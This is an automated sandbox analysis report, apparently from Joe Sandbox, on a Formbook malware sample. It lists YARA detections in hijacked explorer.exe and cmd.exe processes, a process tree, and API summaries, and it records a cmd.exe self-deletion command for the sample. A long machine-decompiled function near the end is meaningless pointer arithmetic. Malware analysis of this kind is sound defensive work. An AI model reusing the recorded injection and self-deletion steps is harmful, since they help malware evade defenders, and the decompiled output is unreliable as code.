                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low

                                  General

                                  Start time:20:22:35
                                  Start date:13/01/2022
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Explorer.EXE
                                  Imagebase:0x7ff6fee60000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:high

                                  General

                                  Start time:20:23:06
                                  Start date:13/01/2022
                                  Path:C:\Windows\SysWOW64\autochk.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\SysWOW64\autochk.exe
                                  Imagebase:0x10c0000
                                  File size:871424 bytes
                                  MD5 hash:34236DB574405291498BCD13D20C42EB
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  General

                                  Start time:20:23:07
                                  Start date:13/01/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                  Imagebase:0x11d0000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:high

                                  General

                                  Start time:20:23:10
                                  Start date:13/01/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:/c del "C:\Users\user\Desktop\Fp4grWelSC.exe"
                                  Imagebase:0x11d0000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:20:23:11
                                  Start date:13/01/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff724c50000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:20:23:42
                                  Start date:13/01/2022
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
                                  Imagebase:0x7ff6fee60000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:20:24:17
                                  Start date:13/01/2022
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:explorer.exe
                                  Imagebase:0x7ff6fee60000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Disassembly

                                  Code Analysis

                                    Execution Graph

                                    Execution Coverage:11.7%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:83
                                    Total number of Limit Nodes:7

                                    Graph


                                    Executed Functions

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 00D6BDC8
                                    • GetCurrentThread.KERNEL32 ref: 00D6BE05
                                    • GetCurrentProcess.KERNEL32 ref: 00D6BE42
                                    • GetCurrentThreadId.KERNEL32 ref: 00D6BE9B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00D69CB6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 00D65429
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D6C017
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00D69D31,00000800,00000000,00000000), ref: 00D69F42
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00D69CB6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688676542.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ccd000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bd63c38145191806ceb51617aaf2ff5507f46b2defe283b152c047d756773fbe
                                    • Instruction ID: 1daa916c5d7517079e67cd04a40e99f14469024a64beaabc8f634f93911436e7
                                    • Opcode Fuzzy Hash: bd63c38145191806ceb51617aaf2ff5507f46b2defe283b152c047d756773fbe
                                    • Instruction Fuzzy Hash: 4B2103B2504240DFCB05DF14D9C0F26BB65FB88328F24C5BDE9064B646C336D946DBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688720814.0000000000CDD000.00000040.00000001.sdmp, Offset: 00CDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_cdd000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cde529918654a95e949bab2cc79660e07eda6b1a607eee85f6453a4776876e1a
                                    • Instruction ID: bf32bfe2c2f99df6a2f2d7885c0e4b929aded540437316d4fc0b580753dd5c60
                                    • Opcode Fuzzy Hash: cde529918654a95e949bab2cc79660e07eda6b1a607eee85f6453a4776876e1a
                                    • Instruction Fuzzy Hash: A921F571904240DFCB14DF24D9C4B26BBA5FBC4314F24C96EDA0A4B346C736E847CA61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688720814.0000000000CDD000.00000040.00000001.sdmp, Offset: 00CDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_cdd000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eab8b023de48d2b6dadc989c6ec1425a400c865126f85502aee90dcb2a4934c2
                                    • Instruction ID: 1b686e082214ae0cf8c465e3120ec2df14ee71f79dcbf34fca950df9d89a402d
                                    • Opcode Fuzzy Hash: eab8b023de48d2b6dadc989c6ec1425a400c865126f85502aee90dcb2a4934c2
                                    • Instruction Fuzzy Hash: 50210771904240EFDB01DF54D9C0B26FBA5FB84314F24C9AEEA0A4B346C736DC46CA61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688720814.0000000000CDD000.00000040.00000001.sdmp, Offset: 00CDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_cdd000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7aae7094de1bee77cfdab513f2973b53132885d6ec8b595c55184c9c4f1542b2
                                    • Instruction ID: 57beb76ec6dd928fb4476a0ac08dffb3edc150f946dad575a6a29e89f6f9b9d7
                                    • Opcode Fuzzy Hash: 7aae7094de1bee77cfdab513f2973b53132885d6ec8b595c55184c9c4f1542b2
                                    • Instruction Fuzzy Hash: C7217F755093808FCB12CF24D994715BF71AB86314F28C5EBD9498B6A7C33A980ACB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688676542.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ccd000_Fp4grWelSC.jbxd
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688720814.0000000000CDD000.00000040.00000001.sdmp, Offset: 00CDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_cdd000_Fp4grWelSC.jbxd
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688676542.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ccd000_Fp4grWelSC.jbxd
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688676542.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ccd000_Fp4grWelSC.jbxd
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 76%
                                    			E00372050(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, intOrPtr* __esi) {
                                    				signed char _t234;
                                    				intOrPtr* _t235;
                                    				signed char _t237;
                                    				intOrPtr* _t238;
                                    				signed char _t240;
                                    				intOrPtr* _t241;
                                    				signed char _t243;
                                    				intOrPtr* _t244;
                                    				signed char _t246;
                                    				signed int _t247;
                                    				signed char _t250;
                                    				signed char _t251;
                                    				signed char _t252;
                                    				signed int _t253;
                                    				signed int _t254;
                                    				signed int _t255;
                                    				signed char _t256;
                                    				signed int _t258;
                                    				signed char _t260;
                                    				signed int _t261;
                                    				signed char _t263;
                                    				signed char _t264;
                                    				signed char _t269;
                                    				signed char _t270;
                                    				signed char _t272;
                                    				signed char _t273;
                                    				intOrPtr* _t274;
                                    				signed char _t275;
                                    				signed char _t276;
                                    				signed int _t277;
                                    				signed int _t278;
                                    				signed char _t283;
                                    				signed char _t285;
                                    				signed int* _t286;
                                    				signed char _t291;
                                    				signed char _t293;
                                    				signed char _t294;
                                    				signed char _t525;
                                    				signed int _t528;
                                    				signed int _t530;
                                    				signed int _t531;
                                    				signed int _t534;
                                    				signed int _t535;
                                    				signed int _t536;
                                    				signed char _t538;
                                    				intOrPtr* _t539;
                                    				signed char _t546;
                                    				signed char _t547;
                                    				signed int* _t548;
                                    				signed char _t549;
                                    				void* _t550;
                                    				intOrPtr* _t551;
                                    				signed char _t604;
                                    				signed char _t605;
                                    				signed char _t606;
                                    				signed int* _t608;
                                    				signed char _t609;
                                    				signed char _t610;
                                    				char* _t611;
                                    				signed char _t612;
                                    				signed char _t613;
                                    				char* _t641;
                                    				signed char _t649;
                                    				signed int _t653;
                                    				signed int _t654;
                                    				signed int _t655;
                                    				signed char _t656;
                                    				signed char _t657;
                                    				signed char _t658;
                                    				signed char _t659;
                                    				signed char _t660;
                                    				signed char _t661;
                                    				signed int _t676;
                                    				signed int _t677;
                                    				intOrPtr* _t678;
                                    				signed int* _t679;
                                    				signed int _t681;
                                    				signed int* _t682;
                                    				intOrPtr* _t684;
                                    				void* _t685;
                                    				void* _t686;
                                    				void* _t687;
                                    				signed int _t688;
                                    				void* _t697;
                                    
                                    				_push(ds);
                                    				 *__eax =  *__eax + __eax;
                                    				_t234 = __eax + 0x0000002a &  *__edx;
                                    				 *_t234 =  *_t234 + _t234;
                                    				_t235 = _t234 + 0x2a;
                                    				_push(ds);
                                    				 *_t235 =  *_t235 + _t235;
                                    				_t237 = _t235 + 0x0000002a &  *__edx;
                                    				 *_t237 =  *_t237 + _t237;
                                    				_t238 = _t237 + 0x2a;
                                    				_push(ds);
                                    				 *_t238 =  *_t238 + _t238;
                                    				_t240 = _t238 + 0x0000002a &  *__edx;
                                    				 *_t240 =  *_t240 + _t240;
                                    				_t241 = _t240 + 0x2a;
                                    				_push(ds);
                                    				 *_t241 =  *_t241 + _t241;
                                    				_t243 = _t241 + 0x0000002a &  *__edx;
                                    				 *_t243 =  *_t243 + _t243;
                                    				_t244 = _t243 + 0x2a;
                                    				_push(ds);
                                    				_t546 = __ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) + 3)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) + 3)) + 4)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) + 3)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) + 3)) + 4)) + 5));
                                    				 *_t244 =  *_t244 + _t244;
                                    				_t246 = _t244 + 0x0000002a &  *__edx;
                                    				_t676 = __edi +  *((intOrPtr*)(_t684 + 1)) +  *((intOrPtr*)(_t684 + 2)) +  *((intOrPtr*)(_t684 + 3)) +  *((intOrPtr*)(_t684 + 4)) +  *((intOrPtr*)(_t684 + 5));
                                    				 *_t246 =  *_t246 + _t246;
                                    				_t247 = _t246 + 0x2a;
                                    				 *_t247 =  *_t247 + _t247;
                                    				 *_t546 =  *_t546 + __edx;
                                    				 *(_t247 + _t247) =  *(_t247 + _t247) ^ _t247;
                                    				_t681 = _t247;
                                    				 *__esi =  *__esi + __esi;
                                    				 *__ecx =  *__ecx + __esi;
                                    				 *__esi =  *__esi + __esi;
                                    				asm("adc [eax], eax");
                                    				_t604 = __ecx +  *__esi;
                                    				asm("adc al, [ecx]");
                                    				 *0x2d0a0000 =  *0x2d0a0000 - __edx;
                                    				_t250 = __esi + 0x0b060000 &  *__edx;
                                    				 *_t676 =  *_t676 - _t250;
                                    				 *_t250 =  *_t250 + _t250;
                                    				_push(es);
                                    				 *_t250 =  *_t250 + _t684;
                                    				asm("adc eax, 0x2d0a0000");
                                    				asm("adc eax, [edx]");
                                    				 *_t604 =  *_t604 - _t604;
                                    				 *_t250 =  *_t250 + _t250;
                                    				_push(es);
                                    				_t653 = __edx |  *__edx |  *(__edx |  *__edx);
                                    				 *_t250 =  *_t250 + _t684;
                                    				asm("adc eax, 0x390a0000");
                                    				_t251 = _t546;
                                    				_t547 = _t250;
                                    				 *_t251 =  *_t251 + _t251;
                                    				 *((intOrPtr*)(_t653 + 1)) =  *((intOrPtr*)(_t653 + 1)) + _t653;
                                    				 *_t251 =  *_t251 + _t251;
                                    				if( *_t251 >= 0) {
                                    					 *0xb060000 =  *0xb060000 - _t251;
                                    				}
                                    				 *_t251 =  *_t251 + _t251;
                                    				_t654 = _t653 |  *_t653;
                                    				 *_t251 =  *_t251 + _t684;
                                    				asm("adc eax, 0x2d0a0000");
                                    				es = es;
                                    				if( *_t251 > 0) {
                                    					 *_t251 =  *_t251 + _t251;
                                    					_push(ss);
                                    					_t649 = (_t604 |  *_t547) +  *_t251;
                                    					_t251 = _t251 + 0xb060000;
                                    					asm("adc al, [ecx]");
                                    					 *_t676 =  *_t676 - _t654;
                                    					 *_t251 =  *_t251 + _t251;
                                    					_t604 = (_t649 |  *(_t654 + _t654)) +  *_t251;
                                    				}
                                    				 *_t251 =  *_t251 - _t547;
                                    				 *_t251 =  *_t251 + _t251;
                                    				_t252 = _t251 |  *_t654;
                                    				 *_t676 =  *_t676 - _t252;
                                    				 *_t252 =  *_t252 + _t252;
                                    				_t655 = _t654 |  *_t654;
                                    				 *_t252 =  *_t252 + _t684;
                                    				asm("adc eax, 0x2d0a0000");
                                    				es = es;
                                    				if( *_t252 > 0) {
                                    					 *_t252 =  *_t252 + _t252;
                                    					es = ss;
                                    					 *_t252 =  *_t252 + _t252;
                                    					_t655 = _t655 |  *_t655;
                                    					 *_t252 =  *_t252 + _t684;
                                    					ss = es;
                                    					 *_t252 =  *_t252 + _t252;
                                    					_t604 = ((_t604 |  *_t547) +  *_t252 |  *(_t655 + _t655)) +  *_t252;
                                    				}
                                    				 *_t252 =  *_t252 - _t547;
                                    				 *_t252 =  *_t252 + _t252;
                                    				_t253 = _t252 |  *_t655;
                                    				 *_t604 =  *_t604 - _t604;
                                    				 *_t253 =  *_t253 + _t253;
                                    				_t656 = _t655 |  *_t655;
                                    				 *_t253 =  *_t253 + _t684;
                                    				asm("adc eax, 0x2d0a0000");
                                    				es = es;
                                    				if( *_t253 > 0) {
                                    					 *_t253 =  *_t253 + _t253;
                                    					 *_t253 =  *_t253 | _t253;
                                    					 *_t681 =  *_t681 + _t253;
                                    					_t656 = _t656 |  *_t656;
                                    					 *_t253 =  *_t253 + _t684;
                                    					ss = ss;
                                    					 *_t253 =  *_t253 + _t253;
                                    					_t604 = ((_t604 |  *_t547) +  *_t253 |  *(_t656 + _t656)) +  *_t253;
                                    				}
                                    				 *_t253 =  *_t253 - _t547;
                                    				 *_t253 =  *_t253 + _t253;
                                    				_t605 = _t604 |  *_t253;
                                    				asm("sbb [eax], eax");
                                    				 *_t656 =  *_t656 + _t605;
                                    				_t254 = _t253 -  *0x167e;
                                    				_t606 = _t605 |  *_t656;
                                    				_push(es);
                                    				 *_t656 =  *_t656 - _t547;
                                    				 *_t254 =  *_t254 + _t254;
                                    				_t657 = _t656 |  *_t681;
                                    				 *_t606 =  *_t606 + 1;
                                    				_t255 = _t254 | 0x720c2c09;
                                    				asm("sbb [eax], eax");
                                    				 *((intOrPtr*)(_t255 + 6)) =  *((intOrPtr*)(_t255 + 6)) + _t657;
                                    				 *_t547 =  *_t547 - _t547;
                                    				 *_t255 =  *_t255 + _t255;
                                    				_t608 = (_t606 |  *_t657) +  *_t255;
                                    				 *_t255 =  *_t255 + _t255;
                                    				 *_t681 =  *_t681 + _t255;
                                    				asm("adc eax, [0x4130511]");
                                    				asm("adc [eax*2+0x8], eax");
                                    				_t256 = _t255 +  *_t255;
                                    				 *_t256 =  *_t256 + _t256;
                                    				asm("adc [eax], eax");
                                    				 *_t256 =  *_t256 + _t256;
                                    				 *_t256 =  *_t256 & _t256;
                                    				 *_t256 =  *_t256 + _t256;
                                    				asm("das");
                                    				while(1) {
                                    					L9:
                                    					 *_t256 =  *_t256 + _t256;
                                    					 *_t681 =  *_t681 + _t547;
                                    					 *_t256 =  *_t256 + _t256;
                                    					 *_t684 =  *_t684 + _t608;
                                    					 *_t256 =  *_t256 + _t256;
                                    					 *_t256 =  *_t256 + _t256;
                                    					 *_t547 = _t608 +  *_t547;
                                    					 *_t256 =  *_t256 + _t256;
                                    					_t681 = _t681 -  *((intOrPtr*)(_t657 + 0x72));
                                    					 *_t256 =  *_t256 ^ _t256;
                                    					 *((intOrPtr*)(_t256 + 6)) =  *((intOrPtr*)(_t256 + 6)) + _t657;
                                    					 *_t547 =  *_t547 - _t547;
                                    					 *_t256 =  *_t256 + _t256;
                                    					_t658 = _t657 |  *_t547;
                                    					_push(es);
                                    					_t685 = _t684 - _t608[0x1c];
                                    					asm("sbb eax, [eax]");
                                    					 *_t658 =  *_t658 + _t608;
                                    					asm("adc eax, [esi]");
                                    					_t548 = _t547 -  *((intOrPtr*)(_t658 + 0x72));
                                    					_t258 = _t676;
                                    					_t677 =  *_t256 * 0x28067000;
                                    					 *_t258 =  *_t258 + _t258;
                                    					if( *_t258 >= 0) {
                                    						 *_t548 =  *_t548 - _t548;
                                    						 *_t258 =  *_t258 + _t258;
                                    						_t658 = _t658 |  *_t548;
                                    					}
                                    					_push(es);
                                    					_t608 = _t608 - _t548[0x1c];
                                    					while(1) {
                                    						_t697 = _t685;
                                    						_pop(_t686);
                                    						 *_t258 =  *_t258 + _t258;
                                    						if( *_t258 >= 0) {
                                    							 *_t547 =  *_t547 - _t547;
                                    							 *_t258 =  *_t258 + _t258;
                                    							_t658 = _t657 |  *_t547;
                                    						}
                                    						_push(es);
                                    						_t676 = _t677 -  *((intOrPtr*)(_t658 + _t681 * 2));
                                    						_t256 = _t258 +  *_t608;
                                    						 *((intOrPtr*)(_t256 + 6)) =  *((intOrPtr*)(_t256 + 6)) + _t658;
                                    						 *_t548 =  *_t548 - _t548;
                                    						 *_t256 =  *_t256 + _t256;
                                    						_t657 = _t658 |  *_t548;
                                    						_push(es);
                                    						_t684 = _t686 -  *0x14772;
                                    						if(_t684 >= 0) {
                                    							 *_t548 =  *_t548 - _t548;
                                    							 *_t256 =  *_t256 + _t256;
                                    							_t657 = _t657 |  *_t548;
                                    						}
                                    						_push(es);
                                    						_t547 = _t548 -  *_t681;
                                    						if(_t547 < 0) {
                                    							goto L9;
                                    						}
                                    						 *_t256 =  *_t256 + _t256;
                                    						if( *_t256 >= 0) {
                                    							 *_t547 =  *_t547 - _t547;
                                    							 *_t256 =  *_t256 + _t256;
                                    							_t658 = _t657 |  *_t547;
                                    						}
                                    						_push(es);
                                    						_t608 = _t608 -  *_t676;
                                    						if(_t608 < 0) {
                                    							continue;
                                    						}
                                    						 *_t256 =  *_t256 + _t256;
                                    						if( *_t256 < 0) {
                                    							L23:
                                    							 *_t256 =  *_t256 + _t256;
                                    							 *_t657 =  *_t657 + _t256;
                                    							 *_t256 =  *_t256 + _t256;
                                    							asm("adc [eax], eax");
                                    							asm("adc al, 0xb");
                                    							_pop(es);
                                    							_t260 = _t256 -  *_t256 -  *((intOrPtr*)(_t256 -  *_t256));
                                    						} else {
                                    							_push(es);
                                    							_t260 = _t256 -  *_t681;
                                    							if(_t260 < 0) {
                                    								 *_t260 =  *_t260 + _t260;
                                    								_t547 = _t547 |  *(_t657 + 0x11);
                                    								_push(es);
                                    								_t256 = _t260 -  *_t260;
                                    								 *_t547 =  *_t547 + _t657;
                                    								 *_t608 =  *_t608 ^ _t256;
                                    								 *_t676 =  *_t676 + _t256;
                                    								goto L23;
                                    							}
                                    						}
                                    						 *_t547 =  *_t547 + _t657;
                                    						 *_t608 =  *_t608 ^ _t260;
                                    						 *_t657 =  *_t657 + _t547;
                                    						 *_t260 =  *_t260 + _t260;
                                    						_t261 = _t260 +  *_t260;
                                    						 *_t608 =  *_t608 + _t657;
                                    						 *_t657 =  *_t657 + _t261;
                                    						 *_t608 =  *_t608 - _t261;
                                    						 *_t261 =  *_t261 + _t261;
                                    						_push(es);
                                    						_t263 = _t261 |  *_t676 |  *_t681;
                                    						_t687 = _t684 + 1;
                                    						 *_t263 =  *_t263 | _t263;
                                    						 *_t263 =  *_t263 + _t263;
                                    						_t264 = _t263 +  *_t263;
                                    						 *_t264 =  *_t264 + _t264;
                                    						_push(es);
                                    						 *_t264 =  *_t264 + _t264;
                                    						 *_t657 = _t608 +  *_t657;
                                    						 *_t264 =  *_t264 + _t264;
                                    						 *_t681 = _t608 +  *_t681;
                                    						 *_t264 =  *_t264 + _t264;
                                    						 *_t657 =  *_t657 + _t657;
                                    						 *_t264 =  *_t264 + _t264;
                                    						 *_t681 =  *_t681 + _t657;
                                    						 *_t264 =  *_t264 + _t264;
                                    						 *_t657 =  *_t657 + _t547;
                                    						 *_t264 =  *_t264 + _t264;
                                    						 *_t681 =  *_t681 + _t547;
                                    						 *_t264 =  *_t264 + _t264;
                                    						 *_t547 = _t608 +  *_t547;
                                    						 *_t264 =  *_t264 & _t547;
                                    						_t549 = _t547 &  *_t608;
                                    						_push(ds);
